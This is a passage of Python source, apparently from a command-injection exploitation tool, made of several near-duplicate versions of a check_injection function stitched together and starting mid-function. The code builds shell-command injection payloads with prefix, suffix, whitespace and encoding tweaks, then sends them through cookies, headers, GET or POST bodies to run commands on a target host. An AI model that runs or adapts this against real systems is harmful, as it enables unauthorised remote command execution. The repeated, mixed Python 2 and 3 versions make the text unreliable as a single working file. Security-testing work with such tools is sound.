settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else : # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+","%2B") # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) data = json.loads(data, strict = False) request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): if alter_shell: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.cmd_execution_alter_shell( separator, TAG, cmd) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = payload.replace(" ", whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: info_msg = "Executing the '" + cmd + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = ''.join(str(e) for e in parameter).replace("+", "%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace( settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request( url, data.encode(settings.UNICODE_ENCODING)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): if alter_shell: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.cmd_execution_alter_shell( separator, TAG, cmd) else: # Classic decision payload (check if host is vulnerable). payload = cb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Whitespace fixation payload = re.sub(" ", whitespace, payload) # Check for base64 / hex encoding payload = checks.perform_payload_encoding(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL >= 1: info_msg = "Executing the '" + cmd + "' command... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload)) if settings.VERBOSITY_LEVEL > 1: print "" # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined method is GET (Default). if http_request_method == "GET": # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url) target = re.sub(settings.INJECT_TAG, payload, url) vuln_parameter = ''.join(vuln_parameter) request = urllib2.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) else: # Check if defined method is POST. parameter = menu.options.data parameter = urllib2.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter) parameter = parameter.replace("+", "%2B") # Define the POST data if settings.IS_JSON == False: data = re.sub(settings.INJECT_TAG, payload, parameter) request = urllib2.Request(url, data) else: payload = payload.replace("\"", "\\\"") data = re.sub(settings.INJECT_TAG, urllib.unquote(payload), parameter) try: data = json.loads(data, strict=False) except: pass request = urllib2.Request(url, json.dumps(data)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request. response = requests.get_request_response(request) return response
def check_injection(separator, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, alter_shell, filename): # Execute shell commands on vulnerable host. if alter_shell: payload = eb_payloads.cmd_execution_alter_shell(separator, TAG, cmd) else: payload = eb_payloads.cmd_execution(separator, TAG, cmd) # Fix prefixes / suffixes payload = parameters.prefixes(payload, prefix) payload = parameters.suffixes(payload, suffix) # Fixation for specific payload. if ")%3B" + _urllib.parse.quote(")}") in payload: payload = payload.replace(")%3B" + _urllib.parse.quote(")}"), ")" + _urllib.parse.quote(")}")) # Whitespace fixation payload = payload.replace(settings.SINGLE_WHITESPACE, whitespace) # Perform payload modification payload = checks.perform_payload_modification(payload) # Check if defined "--verbose" option. if settings.VERBOSITY_LEVEL != 0: debug_msg = "Executing the '" + cmd + "' command. " sys.stdout.write(settings.print_debug_msg(debug_msg)) sys.stdout.flush() sys.stdout.write("\n" + settings.print_payload(payload) + "\n") # Check if defined cookie with "INJECT_HERE" tag if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie: response = cookie_injection_test(url, vuln_parameter, payload) # Check if defined user-agent with "INJECT_HERE" tag elif menu.options.agent and settings.INJECT_TAG in menu.options.agent: response = user_agent_injection_test(url, vuln_parameter, payload) # Check if defined referer with "INJECT_HERE" tag elif menu.options.referer and settings.INJECT_TAG in menu.options.referer: response = referer_injection_test(url, vuln_parameter, payload) # Check if defined host with "INJECT_HERE" tag elif menu.options.host and settings.INJECT_TAG in menu.options.host: response = host_injection_test(url, vuln_parameter, payload) # Check if defined custom header with "INJECT_HERE" tag elif settings.CUSTOM_HEADER_INJECTION: response = custom_header_injection_test(url, vuln_parameter, payload) else: # Check if defined POST data if not settings.USER_DEFINED_POST_DATA: # Check if its not specified the 'INJECT_HERE' tag #url = parameters.do_GET_check(url, http_request_method) target = url.replace(settings.INJECT_TAG, payload) vuln_parameter = ''.join(vuln_parameter) request = _urllib.request.Request(target) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) else : # Check if defined method is POST. parameter = menu.options.data parameter = _urllib.parse.unquote(parameter) # Check if its not specified the 'INJECT_HERE' tag parameter = parameters.do_POST_check(parameter, http_request_method) parameter = ''.join(str(e) for e in parameter).replace("+","%2B") # Define the POST data if settings.IS_JSON: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload.replace("\"", "\\\""))) try: data = checks.json_data(data) except ValueError: pass elif settings.IS_XML: data = parameter.replace(settings.INJECT_TAG, _urllib.parse.unquote(payload)) else: data = parameter.replace(settings.INJECT_TAG, payload) request = _urllib.request.Request(url, data.encode(settings.DEFAULT_CODEC)) # Check if defined extra headers. headers.do_check(request) # Get the response of the request response = requests.get_request_response(request) return response